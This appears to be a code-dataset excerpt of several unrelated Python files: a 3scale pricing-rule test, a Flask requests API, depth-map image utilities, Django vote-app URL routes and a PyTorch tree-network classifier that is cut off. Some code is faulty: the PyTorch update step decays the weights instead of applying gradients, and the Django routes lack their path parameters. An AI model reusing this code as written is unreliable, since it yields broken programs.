"import pytest\n\nfrom threescale_api.resources import ApplicationPlan\n\n\n@pytest.fixture()\ndef pricing_rules(metric, application_plan: ApplicationPlan):\n params = dict(min=10, max=100, cost_per_unit=20)\n application_plan.pricing_rules(metric).create(params)\n return application_plan.pricing_rules(metric).list()\n\n\ndef test_create_pricing_rule(pricing_rules):\n assert pricing_rules is not None\n rule = pricing_rules[0]\n assert rule['max'] == 100\n assert rule['min'] == 10\n assert rule['cost_per_unit'] == '20.0'\n", "sub_path": "tests/integration/test_integration_pricing_rules.py", "file_name": "test_integration_pricing_rules.py", "file_ext": "py", "file_size_in_byte": 532, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "threescale_api.resources.ApplicationPlan", "line_number": 7, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "70384006", "text": "from flask import Flask, request, jsonify\nfrom api.models import requests, Requests\nimport os\nimport sys\nimport json\nsys.path.append(os.getcwd())\n\napp = Flask(__name__)\n\n\n@app.route('/api/v1/users/requests', methods=['POST'])\ndef create_request():\n req = Requests()\n data = request.get_json()\n\n category = data[\"category\"]\n description = data[\"description\"]\n _id = len(requests)\n _id += 1\n\n if str(category) is \"\" or category is None:\n return jsonify({\n \"message\":\n \"Category missing, please fill in the catergory\"\n }), 204\n\n elif str(description) is \"\" or category is None:\n return jsonify({\n \"message\":\n \"Description missing.lease fill in the description\"\n }), 204\n\n else:\n\n req.add_request(_id, category, description)\n\n requests.append(req)\n return jsonify({\"message\": \"You successfully created a request\"}), 201\n\n\n@app.route('/api/v1/users/requests', methods=['GET'])\ndef get_all_requests():\n available_requests = len(requests)\n if available_requests > 0:\n print(available_requests)\n requests_list = []\n for i in requests:\n requests_list.append(i.get_all_data())\n return jsonify({\"requests\": requests_list})\n\n return jsonify({\"message\": \"There are no requests found\"}), 204\n\n\n@app.route('/api/v1/users/requests/', methods=['GET'])\ndef get_single_request(requestid):\n if isinstance(requestid, int):\n return jsonify({\n \"message\": \"You successfully fetched one request\"\n }), 302\n else:\n return jsonify({\"message\": \"This request is not found\"}), 400\n\n\n@app.route('/api/v1/users/requests/', methods=['PUT'])\ndef modify_request(requestid):\n available_requests = len(requests)\n\n if available_requests < 1:\n return jsonify({\n 'message': 'Request to be modified not found!',\n }), 400\n\n else:\n request_data = request.get_json()\n print(request_data)\n for a in requests:\n if a.requestid == requestid:\n a.category = request_data['category']\n a.description = request_data['description']\n return jsonify({\"request\": requests}), 200\n else:\n return jsonify({\n \"message\": \"Request to be modified not found\"\n }), 204\n", "sub_path": "api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2410, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.path.append", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "api.models.Requests", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 14, "usage_type": "name"}, {"api_name": "api.models.requests", "line_number": 18, "usage_type": "argument"}, {"api_name": "flask.jsonify", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 28, "usage_type": "call"}, {"api_name": "api.models.requests.append", "line_number": 37, "usage_type": "call"}, {"api_name": "api.models.requests", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 38, "usage_type": "call"}, {"api_name": "api.models.requests", "line_number": 43, "usage_type": "argument"}, {"api_name": "api.models.requests", "line_number": 47, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 61, "usage_type": "call"}, {"api_name": "api.models.requests", "line_number": 66, "usage_type": "argument"}, {"api_name": "flask.jsonify", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "api.models.requests", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 80, "usage_type": "call"}, {"api_name": "api.models.requests", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 82, "usage_type": "call"}]} +{"seq_id": "56407544", "text": "import numpy as np\nimport h5py\nimport scipy\nimport math\nimport random\nimport skimage.color\nimport skimage.io\nimport skimage.transform\ndef add_boarders(image, labels, patch_size, masked_value):\n \"\"\"\n Adds a boarder to the image according to the array according to the patch_size\n The order will be evenly split to all directions\n\n :param image: (w_image x h_image) np array, usually a depth_map\n :param labels: (w_image x h_image) np array, labels for each depth image pixel\n :param patch_size: 2d vector describing the patch size in [w_patch,h_patch]\n :param masked_value: All boarder pixel are set to this value\n\n :returns ( w_image + w_patch , h_image + h_patch ) np array\n \"\"\"\n result_shape = [image.shape[0] + patch_size[0], image.shape[1] + patch_size[1]]\n result = np.ones(result_shape) * masked_value\n labelsFinal = np.zeros(result_shape)\n xHalf = int(patch_size[0] / 2)\n yHalf = int(patch_size[1] / 2)\n result[xHalf:(result_shape[0] - xHalf -1), yHalf:(result_shape[1] - yHalf -1)] = image\n labelsFinal[xHalf:(result_shape[0] - xHalf - 1), yHalf:(result_shape[1] - yHalf - 1)] = labels\n return result, labelsFinal\n\n\ndef rescale_image_in_z(image, z_scaling_range, z_flip = False):\n # Rescale z\n z_min = np.min(np.min(image))\n z_max = np.max(np.max(image))\n input_z_scale = np.float32(z_max - z_min)\n output_z_range =np.float32(z_scaling_range[1] - z_scaling_range[0])\n #depthmap_centered = np.array(image)\n z_min_image = np.ones(image.shape)*z_min\n input_z_scale_image = np.ones(image.shape)*input_z_scale\n output_z_range_image = np.ones(image.shape) * output_z_range\n depthmap_centered = np.float32(image - z_min_image)\n if z_flip:\n image=input_z_scale_image-depthmap_centered\n\n result = np.float32(depthmap_centered * (output_z_range / input_z_scale) + z_scaling_range[0])\n\n print(\"rescaled image from ( \" + str(z_min) + \" - \" + str(z_max) +\n \" ) to ( \" + str( np.min(np.min(result))) + \" - \" + str( np.max(np.max(result))) + \" )\")\n return result.astype(np.float32)\n\ndef apply_filter(image, masked_value, kernel_size):\n\n image_size = image.shape\n result = np.array(image)\n kernelDelta = int(kernel_size/2)\n\n\n for x in range(kernelDelta, image_size[0] - kernelDelta):\n for y in range(kernelDelta, image_size[1] - kernelDelta):\n\n if image[x][y] == masked_value:\n for i in range(-kernelDelta, kernelDelta+1):\n for j in range(-kernelDelta, kernelDelta + 1):\n result[x+i][y+j] = masked_value\n\n return result\n\ndef apply_contour_filter(image, masked_value =255, kernel_size = 3, simulataion_data = False):\n image_size = image.shape\n result = np.zeros(image_size)\n kernel = int(kernel_size/2)\n\n for x in range(kernel, image_size[0] - kernel):\n for y in range(kernel, image_size[1] - kernel):\n\n curr_value = image[x][y]\n if curr_value == 0 or curr_value == 13:\n if simulataion_data:\n continue # for bin in simulation data\n count = 0\n for i in range(-kernel, kernel+1):\n for j in range(-kernel, kernel + 1):\n if image[x+i][y+j] !=curr_value:\n count+=1\n break\n if count!=0:\n result[x][y] = masked_value\n return result\n\ndef apply_label_filter(labels, kernel_size = 3):\n image_size = labels.shape\n result = labels\n kernel = int(kernel_size/2)\n for x in range(kernel, image_size[0] - kernel):\n for y in range(kernel, image_size[1] - kernel):\n\n curr_value = labels[x,y]\n if curr_value == 0:\n continue\n count = 0\n labels_in_kernel = []\n for i in range(-kernel, kernel+1):\n for j in range(-kernel, kernel + 1):\n if [i,j] == [0,0]:\n continue\n labels_in_kernel.append(labels[x+i,y+j])\n if labels[x+i,y+j]==curr_value:\n count+=1\n if count<=2:\n counts = np.bincount(labels_in_kernel)\n result[x,y] = np.argmax(counts)\n return result\n\n\n\n\n\n\ndef apply_dilation_filter_on_labels(image, labels, masked_value =255, kernel_size = 3):\n image_size = image.shape\n result = labels\n kernel = int(kernel_size/2)\n for x in range(kernel, image_size[0] - kernel):\n for y in range(kernel, image_size[1] - kernel):\n curr_value = labels[x,y]\n\n\n for x in range(kernel, image_size[0] - kernel):\n for y in range(kernel, image_size[1] - kernel):\n curr_value = labels[x,y]\n count = 0\n if curr_value == masked_value:\n for i in range(-kernel, kernel+1):\n for j in range(-kernel, kernel + 1):\n if labels[x+i][y+j] !=masked_value:\n count+=1\n break\n if count>=2:\n result[x,y] = masked_value\n return result\n\n\n\n\n\n\n\n\ndef blur_depth_image(depth_image, kernel_size, masked_value):\n \"\"\"\n Blurs an image according to the following algorithm:\n - A pixel is only blurred if it's equal to the masked_value\n - Then the average of all neighbours unequal to masked_value is used for pixel\n - If there are no neighbours or the pixel is not equal to the masked_value, nothing is changed\n - Borders are not considered\n\n :param depth_image: (w_image x h_image) np array\n :param kernel_size: scalar, should be odd\n :param masked_value: the value which should be\n\n :returns ( w_image + w_patch , h_image + h_patch ) np array\n \"\"\"\n # Initialize image with masked value\n image_size = depth_image.shape\n result = np.ones(image_size) * masked_value\n kernelDelta = int(kernel_size/2)\n\n for x in range(kernelDelta, image_size[0] - kernelDelta):\n for y in range(kernelDelta, image_size[1] - kernelDelta):\n\n if not depth_image[x, y] == masked_value:\n result[x, y] = depth_image[x, y]\n else:\n\n # For each pixel iterate over the kernel\n n_neighbours = 0\n sum_neighbours = 0\n\n for dx in range(kernel_size):\n for dy in range(kernel_size):\n value = depth_image[x - kernelDelta + dx, y - kernelDelta + dy]\n\n if not value == masked_value:\n n_neighbours += 1\n sum_neighbours += value\n\n if n_neighbours > 0:\n result[x, y] = sum_neighbours / n_neighbours\n # Other case not needed since image is initialized with masked_value\n\n return result\n\ndef blur_depth_image_with_labels(depth_image, labels, kernel_size, masked_value):\n \"\"\"\n Blurs an image according to the following algorithm:\n - A pixel is only blurred if it's equal to the masked_value\n - Then the average of all neighbours unequal to masked_value is used for pixel\n - If there are no neighbours or the pixel is not equal to the masked_value, nothing is changed\n - Lables of the hole pixel is changed based on the voting of the lables of the neighbours\n - Borders are not considered\n\n :param depth_image: (w_image x h_image) np array\n :param labels: (w_image x h_image) np array\n :param kernel_size: scalar, should be odd\n :param masked_value: the value which should be\n\n :returns ( w_image + w_patch , h_image + h_patch ) np array\n \"\"\"\n # Initialize image with masked value\n image_size = depth_image.shape\n labels_size = labels.shape\n result = np.ones(image_size) * masked_value\n kernelDelta = int(kernel_size/2)\n\n for x in range(kernelDelta, image_size[0] - kernelDelta):\n for y in range(kernelDelta, image_size[1] - kernelDelta):\n\n if not depth_image[x, y] == masked_value:\n result[x, y] = depth_image[x, y]\n else:\n\n # For each pixel iterate over the kernel\n n_neighbours = 0\n sum_neighbours = 0\n labels_in_kernel = []\n label1 = 0 # Kiste\n label0 = 0\n\n for dx in range(kernel_size):\n for dy in range(kernel_size):\n value = depth_image[x - kernelDelta + dx, y - kernelDelta + dy]\n label_pixel = labels[x - kernelDelta + dx, y - kernelDelta + dy]\n\n\n if not value == masked_value:\n n_neighbours += 1\n sum_neighbours += value\n labels_in_kernel.append(label_pixel)\n # if label_pixel==1.0:\n # label1+=1\n # if label_pixel==0.0:\n # label0+=1\n\n if n_neighbours > 0:\n result[x, y] = sum_neighbours / n_neighbours\n labels[x, y] = np.argmax(np.bincount(labels_in_kernel))\n # if label0 >= label1:\n # labels[x,y]=0.0\n # else:\n # labels[x,y]=1.0\n # Other case not needed since image is initialized with masked_value\n\n return result, labels\n\ndef remove_stray_labels(depth_image, labels, kernel_size, masked_value):\n image_size = depth_image.shape\n labels_size = labels.shape\n result = labels\n kernelDelta = int(kernel_size / 2)\n\n for x in range(kernelDelta, image_size[0] - kernelDelta):\n for y in range(kernelDelta, image_size[1] - kernelDelta):\n if not labels[x,y] == masked_value:\n continue\n else:\n n_neighbours = 0\n sum_neighbours = 0\n labels_neighbours = []\n distance_labels = []\n for dx in range(kernel_size):\n for dy in range(kernel_size):\n value = depth_image[x - kernelDelta + dx, y - kernelDelta + dy]\n label = labels[x - kernelDelta + dx, y - kernelDelta + dy]\n height_diff = abs(value-depth_image[x,y])\n if (dx,dy) != (1,1) :\n distance_labels.append(abs(value-depth_image[x,y]))\n labels_neighbours.append(label)\n\n if label == masked_value:\n sum_neighbours+=1\n if sum_neighbours >=5:\n continue\n else:\n index = np.argmin(distance_labels)\n result[x,y] = labels_neighbours[int(index)]\n return result\n\n\n\n\ndef normalizeDepthMap(depth_image, labels):\n\n depthMin = np.min(depth_image)\n depthMax = np.max(depth_image)\n depthSpan = depthMax -depthMin\n depthMean = np.mean(depth_image)\n #print(\"Depth Mean \", depthMean)\n depth_image_norm = np.zeros(depth_image.shape)\n\n for x in range(depth_image.shape[0]):\n for y in range(depth_image.shape[1]):\n #print(depth_image[x][y])\n depth_image[x][y] = 200 * (depth_image[x][y]-depthMin)/depthSpan\n\n #depth_image_norm[x][y] = (depth_image[x][y]-depthMean)/1\n\n #print(depth_image_norm[x][y], depth_image[x][y])\n print(\"depthMin = \", np.min(depth_image))\n print(\"depthMax = \", np.max(depth_image))\n # depthMean = np.mean(depth_image)\n # print(\"Depth Mean \", depthMean)\n # for x in range(depth_image.shape[0]):\n # for y in range(depth_image.shape[1]):\n # #print(depth_image[x][y])\n # depth_image_norm[x][y] = (depth_image[x][y] - depthMean) / 1\n\n #print(\"Depth Minimum\", depthMin)\n #print(\"Depth Maxmimum\", depthMax)\n\n return depth_image, labels\n\ndef postFilter(depth_image, labels):\n print(\"Shape \", depth_image.shape)\n depthMax = np.max(depth_image)\n for x in range(depth_image.shape[0]-1):\n for y in range(depth_image.shape[1]-1):\n if depth_image[x][y] == depthMax:\n labels[x][y] = 0\n\n return depth_image, labels\n\ndef adjustBorders(depth_image, labels, probability, patch_size):\n labelsFinal = np.zeros(depth_image.shape)\n probabilityFinal = np.zeros(depth_image.shape)\n xHalf = int(patch_size[0] / 2)\n yHalf = int(patch_size[1] / 2)\n labelsFinal[xHalf:(labelsFinal.shape[0] - xHalf ), yHalf:(labelsFinal.shape[1] - yHalf)] = labels\n probabilityFinal[xHalf:(labelsFinal.shape[0] - xHalf), yHalf:(labelsFinal.shape[1] - yHalf)] = probability\n\n return depth_image, labelsFinal, probabilityFinal\n\ndef resize_image(image, min_dim=None, max_dim=None, min_scale=None, mode=\"square\", array_type = 'labels'):\n \"\"\"Resizes an image keeping the aspect ratio unchanged.\n\n min_dim: if provided, resizes the image such that it's smaller\n dimension == min_dim\n max_dim: if provided, ensures that the image longest side doesn't\n exceed this value.\n min_scale: if provided, ensure that the image is scaled up by at least\n this percent even if min_dim doesn't require it.\n mode: Resizing mode.\n none: No resizing. Return the image unchanged.\n square: Resize and pad with zeros to get a square image\n of size [max_dim, max_dim].\n pad64: Pads width and height with zeros to make them multiples of 64.\n If min_dim or min_scale are provided, it scales the image up\n before padding. max_dim is ignored in this mode.\n The multiple of 64 is needed to ensure smooth scaling of feature\n maps up and down the 6 levels of the FPN pyramid (2**6=64).\n crop: Picks random crops from the image. First, scales the image based\n on min_dim and min_scale, then picks a random crop of\n size min_dim x min_dim. Can be used in training only.\n max_dim is not used in this mode.\n\n Returns:\n image: the resized image\n window: (y1, x1, y2, x2). If max_dim is provided, padding might\n be inserted in the returned image. If so, this window is the\n coordinates of the image part of the full image (excluding\n the padding). The x2, y2 pixels are not included.\n scale: The scale factor used to resize the image\n padding: Padding added to the image [(top, bottom), (left, right), (0, 0)]\n \"\"\"\n # Keep track of image dtype and return results in the same dtype\n image_dtype = image.dtype\n # Default window (y1, x1, y2, x2) and default scale == 1.\n h, w = image.shape[:2]\n window = (0, 0, h, w)\n scale = 1\n padding = [(0, 0), (0, 0)]\n cropping = [0,0]\n iScropping = False\n crop = None\n padding_constant = np.amax(image) if array_type == 'depth' else 0 # 0\n\n if mode == \"none\":\n return image, window, scale, padding, crop\n\n # Scale?\n if min_dim:\n # Scale up but not down\n scale = max(1, min_dim / min(h, w))\n if min_scale and scale < min_scale:\n scale = min_scale\n\n # Does it exceed max dim?\n if max_dim and mode == \"square\":\n image_max = max(h, w)\n if round(image_max * scale) > max_dim:\n print(\"Exceeds maximum dimension, needs cropping\")\n mode = \"crop_centre\"\n #scale = max_dim / image_max\n\n # Resize image using bilinear interpolation\n if scale != 1:\n image = skimage.transform.resize(\n image, (round(h * scale), round(w * scale)),\n order=1, mode=\"constant\", preserve_range=True)\n\n # Need padding or cropping?\n if mode == \"square\":\n # Get new height and width\n h, w = image.shape[:2]\n top_pad = (max_dim - h) // 2\n bottom_pad = max_dim - h - top_pad\n left_pad = (max_dim - w) // 2\n right_pad = max_dim - w - left_pad\n padding = [(top_pad, bottom_pad), (left_pad, right_pad)]\n image = np.pad(image, padding, mode='constant', constant_values=padding_constant)\n window = (top_pad, left_pad, h + top_pad, w + left_pad)\n elif mode == \"pad64\":\n h, w = image.shape[:2]\n # Both sides must be divisible by 64\n assert min_dim % 64 == 0, \"Minimum dimension must be a multiple of 64\"\n # Height\n if h % 64 > 0:\n max_h = h - (h % 64) + 64\n top_pad = (max_h - h) // 2\n bottom_pad = max_h - h - top_pad\n else:\n top_pad = bottom_pad = 0\n # Width\n if w % 64 > 0:\n max_w = w - (w % 64) + 64\n left_pad = (max_w - w) // 2\n right_pad = max_w - w - left_pad\n else:\n left_pad = right_pad = 0\n padding = [(top_pad, bottom_pad), (left_pad, right_pad)]\n image = np.pad(image, padding, mode='constant', constant_values=0)\n window = (top_pad, left_pad, h + top_pad, w + left_pad)\n elif mode == \"crop\":\n # Pick a random crop\n h, w = image.shape[:2]\n y = random.randint(0, (h - min_dim))\n x = random.randint(0, (w - min_dim))\n crop = (y, x, min_dim, min_dim)\n image = image[y:y + min_dim, x:x + min_dim]\n window = (0, 0, min_dim, min_dim)\n elif mode == \"crop_centre\":\n iScropping = True\n padding = [(0, 0), (0, 0)]\n h, w = image.shape[:2]\n y_start = (h//2)-(max_dim//2)\n x_start = (w//2)-(max_dim//2)\n if y_start >=0 and x_start>=0:\n image = image[y_start:max_dim+y_start, x_start:max_dim+x_start]\n elif y_start < 0:\n top_pad = (max_dim - h) // 2\n bottom_pad = max_dim - h - top_pad\n left_pad = 0\n right_pad = 0\n padding = [(top_pad, bottom_pad), (left_pad, right_pad)]\n image = np.pad(image, padding, mode='constant', constant_values=padding_constant)\n image = image[:, x_start:max_dim + x_start]\n cropping = [y_start, x_start]\n elif x_start < 0:\n top_pad = 0\n bottom_pad = 0\n left_pad = (max_dim - w) // 2\n right_pad = max_dim - w - left_pad\n padding = [(top_pad, bottom_pad), (left_pad, right_pad)]\n image = np.pad(image, padding, mode='constant', constant_values=padding_constant)\n image = image[y_start:max_dim + y_start, :]\n cropping = [y_start, x_start]\n else:\n raise Exception(\"Mode {} not supported\".format(mode))\n return image.astype(image_dtype), padding , cropping, iScropping\n\ndef flip_depthimage(depthmap):\n input_min = np.min(depthmap)\n input_max = np.max(depthmap)\n input_span = input_max - input_min\n\n depthmap = input_span - depthmap\n\n return depthmap\n\ndef remap_labels_to_org_image(depthmap_org, labels_resize, padding, cropping, iScropping, resize_size = 800):\n print(\"Original Depthmap shape : \", depthmap_org.shape)\n if iScropping == False:\n h, w = labels_resize.shape[:2]\n labels_org = labels_resize[padding[0][0]:h - padding[0][1], padding[1][0]:w - padding[1][1]]\n if labels_org.size == 0:\n labels_org = labels_resize[padding[0][0]:h - padding[0][1],\n padding[1][0]:w - padding[1][1]]\n print(\"Converted Labels Shape : \", labels_org.shape)\n\n else:\n if cropping[0] >= 0 and cropping[1] >= 0:\n h_org, w_org = depthmap_org.shape[:2]\n labels_org = np.zeros(depthmap_org.shape)\n labels_org[cropping[0]:cropping[0] + resize_size, cropping[1]:cropping[1] + resize_size] = labels_resize\n print(\"Converted Labels Shape : \", labels_org.shape)\n\n elif cropping[0] < 0: # h < w\n h_org, w_org = depthmap_org.shape[:2]\n labels_interm = labels_resize[padding[0][0]:resize_size - padding[0][1], :]\n labels_org = np.zeros(depthmap_org.shape)\n labels_org[:, cropping[1]:cropping[1] + resize_size] = labels_interm\n print(\"Converted Labels Shape : \", labels_org.shape)\n elif cropping[1] < 0: # h > w\n h_org, w_org = depthmap_org.shape[:2]\n labels_interm = labels_resize[:, padding[1][0]:resize_size - padding[1][1]]\n labels_org = np.zeros(depthmap_org.shape)\n labels_org[cropping[0]:cropping[0] + resize_size, :] = labels_interm\n print(\"Converted Labels Shape : \", labels_org.shape)\n\n return labels_org", "sub_path": "Code/V2/common/depthmap_helpers.py", "file_name": "depthmap_helpers.py", "file_ext": "py", "file_size_in_byte": 20766, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.ones", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 298, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 309, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 324, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 384, "usage_type": "call"}, {"api_name": "skimage.color.transform.resize", "line_number": 406, "usage_type": "call"}, {"api_name": "skimage.color.transform", "line_number": 406, "usage_type": "attribute"}, {"api_name": "skimage.color", "line_number": 406, "usage_type": "name"}, {"api_name": "numpy.pad", "line_number": 419, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 440, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 445, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 464, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 473, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 481, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 482, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 502, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 509, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 515, "usage_type": "call"}]} +{"seq_id": "443027674", "text": "'''\r\nCreated on 2018. 9. 16.\r\n\r\n@author: user\r\n'''\r\nfrom django.urls import path\r\nfrom .views import *\r\n#하위 urls 파일을 만들 경우, app_name변수가 필요함\r\n#app_name : 해당url등을 그룹핑하는 변수\r\napp_name = 'vote'\r\nurlpatterns = [\r\n #http://127.0.0.1:8000/vote/\r\n path('', index, name='index'),\r\n #http://127.0.0.1:8000/vote/숫자데이터/\r\n path('/', detail, name='detail'),\r\n #http://127.0.0.1:8000/vote/vote\r\n path('vote/',vote, name = 'vote'),\r\n path('result//',result, name='result'),\r\n path('qR/',questionRegister, name='questionRegister'),\r\n path('qU//',questionUpdate, name='questionUpdate'),\r\n path('qD//',questionDelete, name='questionDelete'),\r\n path('cD//', choiceDelete,name='choiceDelete'),\r\n path('cR/',choiceRegister, name='choiceRegister'),\r\n path('cU/',choiceUpdate,name='choiceUpdate'),\r\n ]\r\n", "sub_path": "Django9/src/vote/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 974, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "635356774", "text": "from LoadTrainingData import loadTrainingData\nfrom load_data import loadData\nfrom neededRelations import neededRelations\nimport torch \nimport tqdm, random\nfrom sklearn.metrics import confusion_matrix\nimport numpy as np\n\n\nimport collections\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\n\nclass Net(nn.Module):\n def __init__(self, wordMap, relations, DIM=16, PENULT=45, lamb=.0002, learning_rate=.2):\n super(Net, self).__init__()\n self.DIM=DIM\n self.PENULT=PENULT\n self.vocab_size = len([key for key in wordMap])\n dtype = torch.FloatTensor\n DIM = DIM\n PENULT= PENULT\n self.Vocab = Variable(torch.rand(self.vocab_size, DIM).type(dtype)*.02-.01, requires_grad=True)\n self.matrices = Variable(torch.rand(DIM, DIM, DIM).type(dtype)*.02-.01, requires_grad=True)\n self.matrix = Variable(torch.rand(DIM*2, DIM).type(dtype)*.02-.01, requires_grad=True)\n self.bias = Variable(torch.rand(1, DIM).type(dtype)*.02-.01, requires_grad=True)\n self.classifierMatrices = Variable(torch.rand(DIM, DIM, PENULT).type(dtype)*.02-.01, requires_grad=True)\n self.classifierMatrix = Variable(torch.rand(DIM*2, PENULT).type(dtype)*.02-.01, requires_grad=True)\n self.classifierBias = Variable(torch.rand(1, PENULT).type(dtype)*.02-.01, requires_grad=True)\n self.Dense = Variable(torch.rand(PENULT, len(relations)).type(dtype)*.02-.01, requires_grad=True)\n self.DenseBias = Variable(torch.rand(1, len(relations)).type(dtype)*.02-.01, requires_grad=True)\n self.softmax = nn.Softmax(dim=1)\n self.tanh = nn.Tanh()\n self.leakyRelu = nn.LeakyReLU(.01)\n self.learning_rate = learning_rate\n self.trainable = [self.matrices, self.matrix, self.bias, self.classifierMatrices, self.classifierMatrix, self.classifierBias, self.Dense, self.DenseBias, self.Vocab]\n self.lamb = .0002\n\n def extract_val(self, leaf):\n return self.Vocab.index_select(0, torch.tensor(leaf.wordIndex))\n\n def combine_vals(self, l_val, r_val):\n intermediate = torch.squeeze(torch.matmul(l_val, self.matrices))\n t_r_val = torch.t(r_val)\n tensor_out = torch.t(torch.mm(intermediate, t_r_val))\n\n concated = torch.cat((l_val, r_val), dim=1)\n additive = torch.mm( concated ,self.matrix)\n\n tensor_out += additive\n tensor_out += self.bias\n return self.tanh(tensor_out)\n\n def classify(self, l_val, r_val):\n\n intermediate = torch.squeeze(torch.matmul(l_val, self.classifierMatrices))\n t_r_val = torch.t(r_val)\n tensor_out = torch.t(torch.mm(torch.t(intermediate), t_r_val))\n\n concated = torch.cat((l_val, r_val), dim=1)\n additive = torch.mm( concated, self.classifierMatrix)\n\n tensor_out += additive\n tensor_out += self.classifierBias\n tensor_out = self.leakyRelu(tensor_out)\n tensor_out = torch.mm(tensor_out, self.Dense)\n tensor_out += self.DenseBias\n\n return self.softmax(self.leakyRelu(tensor_out))\n\n def add_tree_network(self, t):\n if len(t.daughters) == 0:\n return self.extract_val(t)\n l = t.daughters[0]\n r = t.daughters[1]\n left_val = None\n right_val = None\n if len(l.daughters) != 0:\n left_val = self.add_tree_network(l)\n else:\n left_val = self.extract_val(l)\n if len(r.daughters) != 0:\n right_val = self.add_tree_network(r)\n else:\n right_val = self.extract_val(r)\n return self.combine_vals(left_val, right_val)\n\n def forward(self, lt, rt):\n #import pdb; pdb.set_trace()\n lt_val = self.add_tree_network(lt)\n rt_val = self.add_tree_network(rt)\n result = torch.squeeze(self.classify(lt_val, rt_val))\n\n return result\n\n def get_vals(self, lt, rt):\n lt_val = self.add_tree_network(lt)\n rt_val = self.add_tree_network(rt)\n return lt_val, rt_val\n\n def update_params(self):\n for el in self.trainable:\n el.data -= self.learning_rate * el.data\n el.grad.zero_()\n '''\n self.matrices.data -= self.learning_rate * self.matrices.grad\n self.Vocab.data -= self.learning_rate * self.Vocab.grad\n self.matrix.data -= self.learning_rate * self.matrix.grad \n self.bias.data -= self.learning_rate * self.bias.grad\n self.classifierMatrices.data -= 